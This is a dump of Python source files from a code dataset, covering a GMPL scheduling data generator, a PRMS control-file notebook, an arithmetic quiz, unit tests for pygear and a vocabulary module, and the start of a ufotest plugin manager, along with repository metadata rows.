    # for each shift length workable in the tour type
    tt_shiftlen_min_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_dys_weeks','min_days_week',
        'min_shiftlen_days_week')
    tt_shiftlen_max_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_dys_weeks','max_days_week',
        'max_shiftlen_days_week')
    tt_shiftlen_min_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_prds_weeks','min_prds_week',
        'min_shiftlen_prds_week')
    tt_shiftlen_max_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_prds_weeks','max_prds_week',
        'max_shiftlen_prds_week')
    # Min and max cumulative days and prds worked each week
    tt_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_cumul_dys_weeks','min_cumul_days_week',
        'min_shiftlen_cumul_days_week')
    tt_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_cumul_dys_weeks','max_cumul_days_week',
        'max_shiftlen_cumul_days_week')
    tt_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_cumul_prds_weeks','min_cumul_prds_week',
        'min_shiftlen_cumul_prds_week')
    tt_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_cumul_prds_weeks','max_cumul_prds_week',
        'max_shiftlen_cumul_prds_week')
    # Min and max cumulative days and prds worked over the weeks
    # for each shift length workable in the tour type
    tt_shiftlen_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_cumul_dys_weeks','min_cumul_days_week',
        'min_shiftlen_cumul_days_week')
    tt_shiftlen_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_cumul_dys_weeks','max_cumul_days_week',
        'max_shiftlen_cumul_days_week')
    tt_shiftlen_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_cumul_prds_weeks','min_cumul_prds_week',
        'min_shiftlen_cumul_prds_week')
    tt_shiftlen_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_cumul_prds_weeks','max_cumul_prds_week',
        'max_shiftlen_cumul_prds_week')
    # Assemble all pieces; each chunk is followed by a newline, matching
    # the output of the original 'print >>' statements.
    for piece in (numlen_param, len_param, numttypes_param, lenxset_set,
                  midthresh_param, tt_lb_param, tt_ub_param,
                  tt_cost_multiplier_param, ptflags_param, ptfrac_param,
                  width_param,
                  tt_min_cumul_dys_weeks_param, tt_max_cumul_dys_weeks_param,
                  tt_min_cumul_prds_weeks_param, tt_max_cumul_prds_weeks_param,
                  tt_min_dys_weeks_param, tt_max_dys_weeks_param,
                  tt_min_prds_weeks_param, tt_max_prds_weeks_param,
                  tt_shiftlen_min_dys_weeks_param,
                  tt_shiftlen_max_dys_weeks_param,
                  tt_shiftlen_min_prds_weeks_param,
                  tt_shiftlen_max_prds_weeks_param,
                  tt_shiftlen_min_cumul_dys_weeks_param,
                  tt_shiftlen_max_cumul_dys_weeks_param,
                  tt_shiftlen_min_cumul_prds_weeks_param,
                  tt_shiftlen_max_cumul_prds_weeks_param):
        mixout.write(piece)
        mixout.write('\n')
    # BUG FIX: the isStringIO=False branch previously returned
    # mixout.read(), which yields '' because the buffer position sits at
    # the end after the writes above; getvalue() is correct in both cases.
    return mixout.getvalue()
def get_length_x_from_mix(ttspec):
    """
    Get list of lists of shift length indexes for each tour type from
    a mix spec.

    Inputs:
        ttspec - yaml representation of tour type mix parameters
    Output:
        A list of lists whose elements are the 1-based, ascending shift
        length indexes for each tour type.
        Example: [[1,2],[2]]
    """
    # Collect every distinct shift length used anywhere in the spec and
    # order ascending; a length's position in this list defines its index.
    unique_lengths = sorted({s['numbins']
                             for tt in ttspec['tourtypes']
                             for s in tt['shiftlengths']})
    index_lists = []
    for tt in ttspec['tourtypes']:
        # Translate each of this tour type's shift lengths into its
        # 1-based position within the ordered length list.
        positions = sorted(unique_lengths.index(s['numbins']) + 1
                           for s in tt['shiftlengths'])
        index_lists.append(positions)
    return index_lists
def get_lengths_from_mix(ttspec):
    """
    Get the set of distinct shift lengths appearing in a mix spec,
    ordered ascending.

    Inputs:
        ttspec - yaml representation of tour type mix parameters
    Output:
        A sorted list of shift lengths.
        Example: [8, 16, 20, 24]
    """
    distinct = set()
    for tt in ttspec['tourtypes']:
        # Each tour type contributes the lengths of all of its shifts.
        distinct.update(s['numbins'] for s in tt['shiftlengths'])
    return sorted(distinct)
def csvrow_to_yaml(fn_csv, isStringIO=True):
    """
    Convert rows of comma or semicolon delimited data into a yaml list
    representation that can be inserted into the yaml mix file.

    This procedure does not know or care what each row means; it just
    takes delimited rows and converts them to yaml sequence items.

    Inputs:
        fn_csv - csv filename containing rows of size n_periods_per_day
        isStringIO - retained for interface compatibility; both branches
            of the original returned the identical string value, so the
            result is the same either way.
    Output:
        yaml version of the csv rows as a string.
    Example:
        Input:  0, 1, 0, 0
        Output:   - [0.0, 1.0, 0.0, 0.0]
    """
    # BUGFIX: the original called `fin.close` without parentheses, which
    # never closed the file. A with-block guarantees closure.
    with open(fn_csv, 'r') as fin:
        # Detect comma vs. semicolon delimiting from the first 1 KB.
        dialect = csv.Sniffer().sniff(fin.read(1024), delimiters=',;')
        fin.seek(0)
        reader = csv.reader(fin, dialect)
        # list() is required for a correct str() rendering on Python 3,
        # where map() returns a lazy iterator instead of a list.
        rows = [list(map(float, row)) for row in reader]
    yamlstr = ''
    for row in rows:
        yamlstr += ' - ' + str(row) + '\n'
    # The original built a StringIO only to immediately return getvalue(),
    # which equals yamlstr; both branches return the same string.
    return yamlstr
def ash_to_dat(fn_yni, fn_mix, isStringIO=True):
    """
    Convert allowable shift start time inputs into GMPL dat form.

    Inputs:
        fn_yni - filename of yaml ini scenario file
        fn_mix - filename of yaml tour type mix file
        isStringIO - true to return the value via a StringIO object,
            false to return the plain string
    Output:
        GMPL dat code for the allow_start parameter, e.g.

        param allow_start:=
        1 1 1 2 0.0
        2 1 1 2 0.0
        ...
    """
    fin_yni = open(fn_yni, "r")
    probspec = yaml.load(fin_yni)
    fin_mix = open(fn_mix, "r")
    ttspec = yaml.load(fin_mix)
    # allow_start[i,j,t,s] = 1 if period i of day j is an allowable shift
    # start time for shift length s of tour type t.
    lengths = get_lengths_from_mix(ttspec)
    rows = []
    for tt in ttspec['tourtypes']:
        for shift in tt['shiftlengths']:
            starttimes = shift['allowable_starttimes']
            for day, day_starts in enumerate(starttimes):
                for prd, flag in enumerate(day_starts):
                    # Shift length index is the 0-based position of this
                    # shift's length in the sorted length list.
                    length_x = lengths.index(shift['numbins'])
                    rows.append([prd + 1, day + 1, length_x + 1,
                                 tt['ttnum'], flag])
    lines = ['param allow_start:=']
    for row in rows:
        lines.append(' '.join(map(str, row)))
    param = '\n'.join(lines) + '\n;\n'
    if isStringIO:
        paramout = StringIO.StringIO()
        paramout.write(param)
        return paramout.getvalue()
    else:
        return param
def wkends_to_dat(fn_yni,fn_mix,isStringIO=True):
    """
    Convert weekends-worked pattern inputs into GMPL dat form.

    Inputs:
        fn_yni - filename of yaml ini scenario file
        fn_mix - filename of yaml tour type mix file
        isStringIO - true to return the value of a StringIO object,
            false to return a plain string
    Output:
        GMPL dat code for the num_weekend_patterns and A parameters.
    """
    fin_yni = open(fn_yni,"r")
    probspec = yaml.load(fin_yni)
    fin_mix = open(fn_mix,"r")
    ttspec = yaml.load(fin_mix)
    n_weeks = probspec['time']['n_weeks']
    # NOTE(review): size() is not defined in this module -- presumably
    # numpy's size() pulled in by a star import elsewhere in the file;
    # len() would be the plain-Python equivalent. TODO confirm.
    n_ttypes = size(ttspec['tourtypes'])
    # All candidate weekend worked/off patterns over the planning horizon.
    patterns_all = create_weekend_base(n_weeks)
    wkend_patterns = []
    # Weekend type 1 = Sun/Sat (days 1 and 7); type 2 = Fri/Sat (days 6 and 7).
    wkend_days = [[],[]]
    wkend_days[0] = [1,7]
    wkend_days[1] = [6,7]
    wkend_rows = []
    num_wkend_rows = []
    for m in ttspec['tourtypes']:
        tt = m['ttnum']
        # Patterns admissible for this tour type, split by weekend type.
        wkend_patterns = [[],[]]
        wkend_patterns[0] = [row for row in patterns_all if filterpatterns(row,tt,1,ttspec)]
        wkend_patterns[1] = [row for row in patterns_all if filterpatterns(row,tt,2,ttspec)]
    # param A[p,j,w,t,e] = 1 if weekend pattern p calls for work on day j of week k for tour type t having weekend type e and 0 otherwise
    # NOTE(review): wkend_patterns is reassigned on every pass of the loop
    # above, so only the last tour type's filtered patterns survive to this
    # point while t still iterates over all tour types -- verify that this
    # is the intended behavior.
    for i in range(2):
        for t in range(1,n_ttypes+1):
            for p in range(len(wkend_patterns[i])):
                for w in range(n_weeks):
                    for j in range(2):
                        L = [p+1,wkend_days[i][j],w+1,t,i+1,wkend_patterns[i][p][w][j]]
                        wkend_rows.append(L)
    # Count of admissible patterns for each (weekend type, tour type) pair.
    for t in range(1,n_ttypes+1):
        for i in range(2):
            L = [i+1,t,len(wkend_patterns[i])]
            num_wkend_rows.append(L)
    param = 'param num_weekend_patterns:=\n'
    for val in num_wkend_rows:
        datarow = ' '.join(map(str, val)) + '\n'
        param += datarow
    param += ";\n"
    param += '\nparam A:=\n'
    for val in wkend_rows:
        datarow = ' '.join(map(str, val)) + '\n'
        param += datarow
    param += ";\n"
    if isStringIO:
        paramout = StringIO.StringIO()
        paramout.write(param)
        return paramout.getvalue()
    else:
        return param
def tester():
    """Ad hoc scratch routine used for manually exercising parts of this module."""
    #print csvrow_to_yaml('infiles/oneweekash.csv',False)
    p = create_weekend_base(4)
##    p = [(0,1),(1,1),(0,0),(1,0)]
##    n = num_full_weekends(p,1)
def mwts_createdat(fn_yni,fn_dat):
    """
    Create a GMPL dat file for mwts problems.

    Inputs:
        fn_yni - Name of YAML input file for the mwts problem
        fn_dat - Name of GMPL dat file to create
    Output:
        Writes the fully assembled GMPL dat code to the file fn_dat.
    """
    fin = open(fn_yni,"r")
    probspec = yaml.load(fin)
    # General section: time dimensions of the scheduling problem
    num_prds_per_day_param = scalar_to_param('n_prds_per_day',
                                             probspec['time']['n_prds_per_day'])
    num_days_per_week_param = scalar_to_param('n_days_per_week',
                                              probspec['time']['n_days_per_week'])
    num_weeks_param = scalar_to_param('n_weeks',
                                      probspec['time']['n_weeks'])
    # Cost related: labor budget and the two-tier understaffing penalty
    labor_budget_param = scalar_to_param('labor_budget',probspec['cost']
                                         ['labor_budget'])
    cu1_param = scalar_to_param('cu1',probspec['cost']
                                ['understaff_cost_1'])
    cu2_param = scalar_to_param('cu2',probspec['cost']
                                ['understaff_cost_2'])
    usb_param = scalar_to_param('usb',probspec['cost']
                                ['understaff_1_lb'])
    # Demand section
    dmd_dat = dmd_min_to_dat('dmd_staff',probspec['reqd_files']['filename_dmd'],mode='unsliced')
    # Min staff section
    min_dat = dmd_min_to_dat('min_staff',probspec['reqd_files']['filename_min'],mode='unsliced')
    # Mix section (tour type mix parameters)
    mix_dat = mix_to_dat(probspec)
    # Weekends worked patterns section
    wkends_dat = wkends_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
    # Allowable shift start time section
    ash_dat = ash_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
    # Put the pieces together. NOTE: Python 2 "print >>buf" syntax writes
    # each section (plus a trailing newline) into the StringIO buffer.
    dat = StringIO.StringIO()
    print >>dat, num_prds_per_day_param
    print >>dat, num_days_per_week_param
    print >>dat, num_weeks_param
    print >>dat, labor_budget_param
    print >>dat, cu1_param
    print >>dat, cu2_param
    print >>dat, usb_param
    print >>dat, mix_dat
    print >>dat, dmd_dat
    print >>dat, min_dat
    print >>dat, wkends_dat
    print >>dat, ash_dat
    fout = open(fn_dat,"w")
    print >>fout, dat.getvalue()
    fout.close()
def main():
    """
    Driver: build the GMPL dat file for the hard coded 'simple' test
    scenario. The ## lines are earlier manual tests kept for reference.
    """
##    dmd_min_to_dat('dmd_staff','infiles/jax_4week.dmd','test.out')
##    testout = dmd_min_to_datstringio('dmd_staff','infiles/jax_4week.dmd')
##    fout = open('teststringio.out',"w")
##    print "Starting to write stringio"
##    print >>fout, testout
##    print "Ending write stringio"
##    fout.close()
    mwts_createdat('/home/mark/Documents/research/MultiWeek/exps/mwts01/inputs/simple.yni','/home/mark/Documents/research/MultiWeek/wsmwts/pymwts/tests/simple.dat')
    #tester()
if __name__ == '__main__':
main()
| 5,173 | 0 | 115 |
449d1fc3442d6fde6ba47c80a9453ec71f482f75 | 914 | py | Python | 11_gsflow/Check sagehen control file.py | pnorton-usgs/notebooks | 17a38ecd3f3c052b9bd785c2e53e16a9082d1e71 | [
"MIT"
] | null | null | null | 11_gsflow/Check sagehen control file.py | pnorton-usgs/notebooks | 17a38ecd3f3c052b9bd785c2e53e16a9082d1e71 | [
"MIT"
] | null | null | null | 11_gsflow/Check sagehen control file.py | pnorton-usgs/notebooks | 17a38ecd3f3c052b9bd785c2e53e16a9082d1e71 | [
"MIT"
] | null | null | null | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python [conda env:bandit_38]
# language: python
# name: conda-env-bandit_38-py
# ---
# %% language="javascript"
# IPython.notebook.kernel.restart()
# %%
from pyPRMS.ControlFile import ControlFile
# %%
base_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/tests_prms6/sagehen/prms6'
control_dir = f'{base_dir}'
control_file = f'{control_dir}/prms6.control'
# %%
ctl = ControlFile(control_file)
# %%
ctl.control_variables.keys()
# %%
print(ctl.get('windspeed_day'))
# %%
modules_used = ctl.modules.values()
print(modules_used)
# %%
ctl.modules.items()
# %%
ctl.get('temp_module').values
# %%
# %%
ctl.write(f'{control_dir}/prms6.control')
# %%
| 17.576923 | 91 | 0.666302 | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python [conda env:bandit_38]
# language: python
# name: conda-env-bandit_38-py
# ---
# %% language="javascript"
# IPython.notebook.kernel.restart()
# %%
from pyPRMS.ControlFile import ControlFile
# %%
base_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/tests_prms6/sagehen/prms6'
control_dir = f'{base_dir}'
control_file = f'{control_dir}/prms6.control'
# %%
ctl = ControlFile(control_file)
# %%
ctl.control_variables.keys()
# %%
print(ctl.get('windspeed_day'))
# %%
modules_used = ctl.modules.values()
print(modules_used)
# %%
ctl.modules.items()
# %%
ctl.get('temp_module').values
# %%
# %%
ctl.write(f'{control_dir}/prms6.control')
# %%
| 0 | 0 | 0 |
909094cdb2b9de5d6070c452b32d0ee249e210c5 | 1,999 | py | Python | Arithmetic Exam Application/arithmetic.py | andreimaftei28/projects-on-JetBrainAcademy | 8c2b8ab7bab5757db94e9f0b6d55c33852f64ee1 | [
"MIT"
] | null | null | null | Arithmetic Exam Application/arithmetic.py | andreimaftei28/projects-on-JetBrainAcademy | 8c2b8ab7bab5757db94e9f0b6d55c33852f64ee1 | [
"MIT"
] | null | null | null | Arithmetic Exam Application/arithmetic.py | andreimaftei28/projects-on-JetBrainAcademy | 8c2b8ab7bab5757db94e9f0b6d55c33852f64ee1 | [
"MIT"
] | null | null | null | import random
level1 = "simple operations with numbers 2-9"
level2 = "integral squares of 11-29"
message = f"Which level do you want? Enter a number:\n1 - {level1}\n2 - {level2}\n "
user_choice = choose_level(input(message))
while user_choice == "Incorrect format.":
print(user_choice)
user_choice = choose_level(input(message))
n = check_result(user_choice)
save_res = input(f"Your mark is {n}/5. Would you like to save the result? Enter yes or no.\n")
if save_res.lower() == "yes" or save_res.lower() == "y":
name = input("What is your name?\n")
with open("results.txt", "a") as file:
file.write(f"{name}: {n}/5 in level {user_choice} ({level1 if user_choice == 1 else level2})")
print(f'The results are saved in "{file.name}"') | 28.15493 | 102 | 0.563782 | import random
def operations(*args):
    """
    Evaluate an exam expression.

    With three arguments (operand, operator, operand) apply the binary
    operator '+', '-' or '*'; with a single argument return its square.
    """
    if len(args) > 1:
        left, op, right = args
        # Guard-clause dispatch on the operator symbol.
        if op == "+":
            return left + right
        if op == "-":
            return left - right
        if op == "*":
            return left * right
    else:
        # Level-2 questions supply a single number to be squared.
        return args[0] ** 2
def int_or_float(var):
    """
    Parse the user's answer string into a number.

    Returns a float when the string contains a decimal point, an int
    otherwise, or the sentinel string "Incorrect format." when the input
    is empty or not a valid number.
    """
    if var == "":
        return "Incorrect format."
    try:
        # Answers with a decimal point are parsed as floats so that e.g.
        # "5.0" compares equal to a float result.
        if "." in var:
            return float(var)
        return int(var)
    except ValueError:
        # BUGFIX: the original bare `except:` also swallowed
        # KeyboardInterrupt/SystemExit; only a failed numeric conversion
        # should be reported as bad input.
        return "Incorrect format."
def choose_level(var):
    """Validate a level choice string; return 1 or 2, or the sentinel on bad input."""
    return int(var) if var in ("1", "2") else "Incorrect format."
level1 = "simple operations with numbers 2-9"
level2 = "integral squares of 11-29"
message = f"Which level do you want? Enter a number:\n1 - {level1}\n2 - {level2}\n "
user_choice = choose_level(input(message))
while user_choice == "Incorrect format.":
print(user_choice)
user_choice = choose_level(input(message))
def check_result(choice):
    """
    Run a five-question exam for the chosen level and return the score.

    Level 1 poses random binary operations on numbers 2-9; any other
    choice poses squaring of numbers 11-29. Questions are printed to
    stdout, answers are read from stdin, and unparseable answers are
    re-prompted without penalty.

    :param choice: the level selected by the user (1 or 2)
    :return: number of correct answers (0-5)
    """
    a = 0  # running count of correct answers
    for _ in range(5):
        if choice == 1:
            # operand, operator, operand for a random binary expression
            *args, = random.randrange(2, 10), random.choice("+-*"), random.randrange(2, 10)
        else:
            # a single operand: the question is to square it
            *args, = random.randrange(11, 30),
        print(*args)
        result = operations(*args)
        users_result = int_or_float(input())
        # Keep prompting until the answer parses as a number.
        while users_result == "Incorrect format.":
            print(users_result)
            users_result = int_or_float(input())
        if users_result == result:
            a += 1
            print("Right!")
        else:
            print("Wrong!")
    return a
n = check_result(user_choice)
save_res = input(f"Your mark is {n}/5. Would you like to save the result? Enter yes or no.\n")
if save_res.lower() == "yes" or save_res.lower() == "y":
name = input("What is your name?\n")
with open("results.txt", "a") as file:
file.write(f"{name}: {n}/5 in level {user_choice} ({level1 if user_choice == 1 else level2})")
print(f'The results are saved in "{file.name}"') | 1,137 | 0 | 92 |
2956ea9a2b0645c1c811dc3b0a8f13efd29c18be | 1,245 | py | Python | tests/test_task.py | Yelp/pygear | 8d9fe5f81b68666749149b1a64350c856b8a14a4 | [
"BSD-3-Clause"
] | 4 | 2015-04-01T21:38:09.000Z | 2021-04-29T00:02:09.000Z | tests/test_task.py | Yelp/pygear | 8d9fe5f81b68666749149b1a64350c856b8a14a4 | [
"BSD-3-Clause"
] | 6 | 2015-01-29T21:19:32.000Z | 2018-01-14T00:35:31.000Z | tests/test_task.py | Yelp/pygear | 8d9fe5f81b68666749149b1a64350c856b8a14a4 | [
"BSD-3-Clause"
] | 5 | 2015-02-04T02:17:59.000Z | 2016-06-07T12:38:12.000Z | import gc
import mock
import pytest
import pygear
from . import noop_serializer
@pytest.fixture
| 17.054795 | 75 | 0.714859 | import gc
import mock
import pytest
import pygear
from . import noop_serializer
@pytest.fixture
def t():
return pygear.Task(None, None)
def test_task_data_size(t):
assert t.data_size() == 0
def test_task_denominator(t):
assert t.denominator() == 0
def test_task_error(t):
assert t.error() is None
def test_task_function_name(t):
assert t.function_name() is None
def test_task_is_known(t):
assert not t.is_known()
def test_task_is_running(t):
assert not t.is_running()
def test_task_job_handle(t):
assert t.job_handle() is None
def test_task_numerator(t):
assert t.numerator() == 0
def test_task_result(t):
assert t.result() is None
def test_task_returncode(t):
assert pygear.describe_returncode(t.returncode()) == 'INVALID_ARGUMENT'
def test_task_set_serializer(t):
t.set_serializer(noop_serializer()) # valid
with pytest.raises(AttributeError): # invalid
t.set_serializer("a string doesn't implement loads.")
def test_task_strstate(t):
assert t.strstate() is None
def test_task_unique(t):
assert t.unique() is None
def test_gc_traversal(t):
sentinel = mock.Mock()
t.set_serializer(sentinel)
assert sentinel in gc.get_referents(t)
| 787 | 0 | 344 |
6c8c72e97a9e8e3f052049a4d52baeae902f0f4a | 700 | py | Python | tests/vocab_test.py | samuela/happyentropy | be7ac0ef255ac4336c7903b9e4e3ad36065fda9d | [
"MIT"
] | null | null | null | tests/vocab_test.py | samuela/happyentropy | be7ac0ef255ac4336c7903b9e4e3ad36065fda9d | [
"MIT"
] | null | null | null | tests/vocab_test.py | samuela/happyentropy | be7ac0ef255ac4336c7903b9e4e3ad36065fda9d | [
"MIT"
] | null | null | null | import unittest
from happyentropy import vocab
if __name__ == '__main__':
unittest.main()
| 29.166667 | 49 | 0.737143 | import unittest
from happyentropy import vocab
def all_unique(lst):
    """Return True when *lst* contains no duplicate elements."""
    return len(lst) == len(set(lst))
class VocabTest(unittest.TestCase):
    """Sanity checks on the word lists defined in happyentropy.vocab."""

    def testLengths(self):
        # List sizes are fixed powers of two (32, 128, 128, 128, 64) --
        # presumably so each word choice encodes a whole number of bits
        # of entropy; TODO confirm against the passphrase generator.
        self.assertEqual(len(vocab.COUNTS), 32)
        self.assertEqual(len(vocab.ADJECTIVES), 128)
        self.assertEqual(len(vocab.ANIMALS), 128)
        self.assertEqual(len(vocab.VERBS), 128)
        self.assertEqual(len(vocab.ADVERBS), 64)

    def testUnique(self):
        # Duplicate words would reduce the effective entropy of a list.
        self.assertTrue(all_unique(vocab.COUNTS))
        self.assertTrue(all_unique(vocab.ADJECTIVES))
        self.assertTrue(all_unique(vocab.ANIMALS))
        self.assertTrue(all_unique(vocab.VERBS))
        self.assertTrue(all_unique(vocab.ADVERBS))
if __name__ == '__main__':
unittest.main()
| 498 | 14 | 95 |
bd0d3e125e8fa9cf371de0d2149bace1dd5a5ff2 | 11,845 | py | Python | ufotest/plugin.py | the16thpythonist/ufotest | 8c94e4227180328e6c29d6700c9a5f4aaecab3d2 | [
"MIT"
] | null | null | null | ufotest/plugin.py | the16thpythonist/ufotest | 8c94e4227180328e6c29d6700c9a5f4aaecab3d2 | [
"MIT"
] | 3 | 2021-03-19T15:52:59.000Z | 2022-01-13T03:32:31.000Z | ufotest/plugin.py | the16thpythonist/ufotest | 8c94e4227180328e6c29d6700c9a5f4aaecab3d2 | [
"MIT"
] | null | null | null | import os
import sys
import importlib.util
from typing import Any, Callable, Tuple
from collections import defaultdict
"""
PLANNING
So I want the plugin manager to work really similar to how the hook system in Wordpress works:
https://developer.wordpress.org/plugins/hooks/
Thats because I already have a lot of experience with that system and I kind of really like it. It just makes sense
and is rather intuitive to use. The main point is that it uses hooks: A hook is essentially a point in the execution
of the main program where a plugin can insert custom functionality to be executed. Wordpress differs between two
types of hooks: action hooks simply allow the execution of code, they dont have a return value. filter hooks allow
the modification of certain important values of the main program.
"""
class PluginManager:
    """
    Manages the plugin related functionality for ufotest: the dynamic
    discovery and loading of plugins at the beginning of the program
    execution and the registration and invocation of the additional action
    and filter hooks added by those plugins.

    **UFOTEST PLUGIN SYSTEM**

    The hook system is strongly influenced by the Wordpress plugin system
    (https://developer.wordpress.org/plugins/hooks/). Plugins register
    callback functions for named hooks and the main routine invokes those
    hooks at vital points of its execution. Two kinds of hooks exist:
    *action* hooks simply execute the registered callbacks and have no
    return value, while *filter* hooks pass a value through each callback
    in priority order and return the (possibly modified) result.

    **USING THE PLUGIN MANAGER**

    .. code-block:: python

        pm = PluginManager("/path/to/plugins")
        pm.load_plugins()

        # Some time later
        data = {}
        data_filtered = pm.apply_filter("custom_filter", data)
        pm.do_action("custom_action")

    **LOADING THE PLUGINS**

    Plugins are imported dynamically from the plugin folder passed to the
    constructor. Assumptions about what constitutes a valid plugin:

    - Each plugin is a FOLDER. The folder name is used as the plugin name,
      by which it will be identified.
    - Each plugin folder has to contain at least a "main.py" python module.
      This is what is actually imported, so all of its top level code is
      executed at import time.
    - Folders whose names start with an underscore or a dot are ignored.
      This keeps __pycache__ and hidden folders (.git, .idea) out of the
      import path and doubles as a quick way to disable a plugin.
    """

    def __init__(self, plugin_folder_path: str = ''):
        """
        Creates a new plugin manager for the given *plugin_folder_path*.

        BUGFIX: this initializer was missing even though every method reads
        self.plugin_folder_path, self.plugins, self.filters or
        self.actions; it is restored here so the class works on its own.

        :param plugin_folder_path: The path of the folder which contains
            the plugin folders. Environment variables in the path are
            expanded.
        """
        self.plugin_folder_path = os.path.expandvars(plugin_folder_path)
        # plugin name -> imported "main" module instance
        self.plugins = {}
        # hook name -> list of {'callback': Callable, 'priority': int}
        self.filters = defaultdict(list)
        self.actions = defaultdict(list)

    # -- For invoking hooks in the main system --

    def do_action(self, hook_name: str, *args, **kwargs) -> None:
        """
        Executes all the plugin functions which have been hooked to the
        action hook identified by *hook_name*.

        Additional positional and keyword arguments are passed as they are
        to the registered callbacks. Callbacks run in order of descending
        priority.

        :param hook_name: The string name identifying the hook to be executed.

        :return: void
        """
        if hook_name in self.actions.keys():
            callback_specs = sorted(self.actions[hook_name], key=lambda spec: spec['priority'], reverse=True)
            callbacks = [spec['callback'] for spec in callback_specs]
            for callback in callbacks:
                callback(*args, **kwargs)

    def apply_filter(self, hook_name: str, value: Any, *args, **kwargs) -> Any:
        """
        Applies all the plugin callback functions which have been hooked to
        the filter hook identified by *hook_name* to filter the given
        *value*. The result of each filter operation is passed as the value
        argument to the next filter callback in order of descending
        priority.

        Additional positional and keyword arguments are passed as they are
        to the registered callbacks.

        :param hook_name: The string name identifying the hook to be executed.
        :param value: Whatever value that specific hook is supposed to manipulate

        :return: The manipulated version of the passed value argument
        """
        filtered_value = value
        if hook_name in self.filters.keys():
            callback_specs = sorted(self.filters[hook_name], key=lambda spec: spec['priority'], reverse=True)
            callbacks = [spec['callback'] for spec in callback_specs]
            for callback in callbacks:
                filtered_value = callback(filtered_value, *args, **kwargs)
        return filtered_value

    # -- For registering hook callbacks in the plugins --

    def register_filter(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
        """
        Registers a new filter *callback* function for the hook identified
        by *hook_name* with the given *priority*.

        :param hook_name: The name of the hook for which to register the function
        :param callback: A callable to be executed when the hook is invoked.
            Since this is a filter hook, it needs to accept at least one
            argument (the value to be filtered) and return a manipulated
            version of that value.
        :param priority: The integer priority of this callback. Default is 10.

        :return: void
        """
        self.filters[hook_name].append({
            'callback': callback,
            'priority': priority
        })

    def register_action(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
        """
        Registers a new action *callback* function for the hook identified
        by *hook_name* with the given *priority*.

        :param hook_name: The name of the hook for which to register the function
        :param callback: A callable to be executed when the hook is invoked.
        :param priority: The integer priority of this callback. Default is 10.

        :return: void
        """
        self.actions[hook_name].append({
            'callback': callback,
            'priority': priority
        })

    # -- Loading the plugins --

    def load_plugins(self):
        """
        Loads all the plugins from the plugin folder which was passed to
        the constructor. After this method runs, the internal dicts
        "filters" and "actions" contain all the callables linked to their
        hook names.

        :return: void
        """
        for root, folders, files in os.walk(self.plugin_folder_path, topdown=True):
            for folder_name in folders:
                # Ignore folders starting with an underscore (skips
                # __pycache__ and allows quick disabling of plugins) and
                # hidden folders starting with a dot (.idea, .git).
                if folder_name[0] in ['_', '.']:
                    continue

                plugin_path = os.path.join(root, folder_name)
                plugin_name, module = self.import_plugin_by_path(plugin_path)
                self.plugins[plugin_name] = module

            # Only walk the top level so plugin sub-folders are not
            # themselves treated as plugins (previously a bug).
            break

    def reset(self):
        """
        Resets the plugin manager: unloads all registered filter and action
        hooks and clears the internal references to the plugin modules.

        :returns: void
        """
        self.filters = defaultdict(list)
        self.actions = defaultdict(list)
        self.plugins = {}

    @classmethod
    def import_plugin_by_path(cls, path: str) -> Tuple[str, Any]:
        """
        Given the path of a folder, dynamically imports the "main.py"
        module within it, interpreting the folder as a ufotest plugin.

        :raises FileNotFoundError: if the folder has no main.py module.

        :return: A tuple (plugin name, imported module instance).
        """
        plugin_name = os.path.basename(path)
        plugin_main_module_path = os.path.join(path, 'main.py')
        if not os.path.exists(plugin_main_module_path):
            raise FileNotFoundError((
                f'Cannot import folder "{plugin_name}" as an ufotest plugin, because the folder does not contain a '
                f'main.py python module. All ufotest plugins need to have a main.py file! This is the top level file '
                f'which is imported to import the plugins functionality into the ufotest system.\n '
                f'Path being checked: {plugin_main_module_path}'
            ))

        # Add the parent folder of the plugin folder to sys.path so a
        # plugin's main.py can import sibling modules of its own package.
        plugin_folder = os.path.dirname(path)
        if plugin_folder not in sys.path:
            sys.path.append(plugin_folder)

        spec = importlib.util.spec_from_file_location(plugin_name, plugin_main_module_path)
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        sys.modules[plugin_name] = module

        return plugin_name, module
| 50.190678 | 119 | 0.690756 | import os
import sys
import importlib.util
from typing import Any, Callable, Tuple
from collections import defaultdict
"""
PLANNING
So I want the plugin manager to work really similar to how the hook system in Wordpress works:
https://developer.wordpress.org/plugins/hooks/
Thats because I already have a lot of experience with that system and I kind of really like it. It just makes sense
and is rather intuitive to use. The main point is that it uses hooks: A hook is essentially a point in the execution
of the main program where a plugin can insert custom functionality to be executed. Wordpress differs between two
types of hooks: action hooks simply allow the execution of code, they dont have a return value. filter hooks allow
the modification of certain important values of the main program.
"""
class PluginManager:
"""
This class represents the plugin manager which is responsible for managing the plugin related functionality for
ufotest. This mainly included the dynamic discovery and loading of the plugins at the beginning of the program
execution and the management and application of the additional action and filter hooks added by those plugins.
**UFOTEST PLUGIN SYSTEM**
The ufotest plugin system is strongly influenced by the Wordpress plugin system
(https://developer.wordpress.org/plugins/hooks/). It uses so called hooks to enable plugins to insert custom
functions to be executed at vital points during the ufotest main program routine. A plugin simply has to decorate
